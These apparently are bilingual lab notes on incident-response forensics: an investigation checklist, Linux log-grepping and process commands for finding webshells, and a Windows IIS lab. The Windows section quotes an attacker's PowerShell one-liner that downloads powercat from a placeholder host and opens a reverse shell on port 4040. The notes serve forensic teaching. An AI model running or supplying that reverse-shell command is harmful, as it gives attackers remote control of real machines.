CyberLab-Eventlog

Cyberlab event log 分析

• 凡走過必留下痕跡
  • File
  • Network
  • Process&Memory

Threat hunting

準備 > 偵測分析 > 移除復原 > 後續檢討

事件調查思路

• 人
  • 確認誰被攻擊
  • 確認攻擊來源
• 事
  • 確認事件類別
  • 過去是否發生過
• 時
  • 確認攻擊時間點
• 地
  • 確認發生的網段
  • 誰可以存取
  • 平時如何管理
• 物
  • 確認有甚麼東西產生
  • 確認是否有東西流出

Forensic

• History&log
  • shell history
  • Web accesslog
  • Eventlog
• Process
  • Services
  • Connection
• File
  • App(binary,script)
  • Autoruns
  • Config

linux forensic (file-webshell)

• Web service access logs:
  • mtime n : File’s data was last modified n minutes ago
  • atime n : File was last accessed n minutes ago.

cat access |grep -i "200" |grep -i ".php" | cut -d " " -f 7 |sort |uniq -c |sort -nr |less

cat access.log.2|grep -i '.php' | grep -Ei "s.php|admine21_decode.php" -B 10 | cut -d " " -f 1,4,7|less

zless access.log.2.gz|grep -iE "\/s.php|admin21_decode.php" | cut -d " " -f 1 | sort |uniq

• ps -ef
• ls /proc
• strace -f -p pid
• lsof -i:port
• lsof -p pid
• crontab -e
• cat /etc/rc.local
• ls /etc/init.d
• ls /etc/profile.d
• ls /var/log/cron*
• ls /var/log/secure*

lab - windows7 iis server forensic

• History&log
  • web access log (iis log)
  • eventlog (4688,sysmon)
• Process
  • services
  • connection
• File
  • App (binary,script)
  • autoruns
  • config
• executing history
  • shimacache
  • amcache

IEX(new-object system.net.webclient).downloadstring('http://ip/powercat.ps1');powercat -c ip -p 4040 -e cmd.exe

• windows webshell
• parentprocessid:3444
• parentimage: w3wp.exe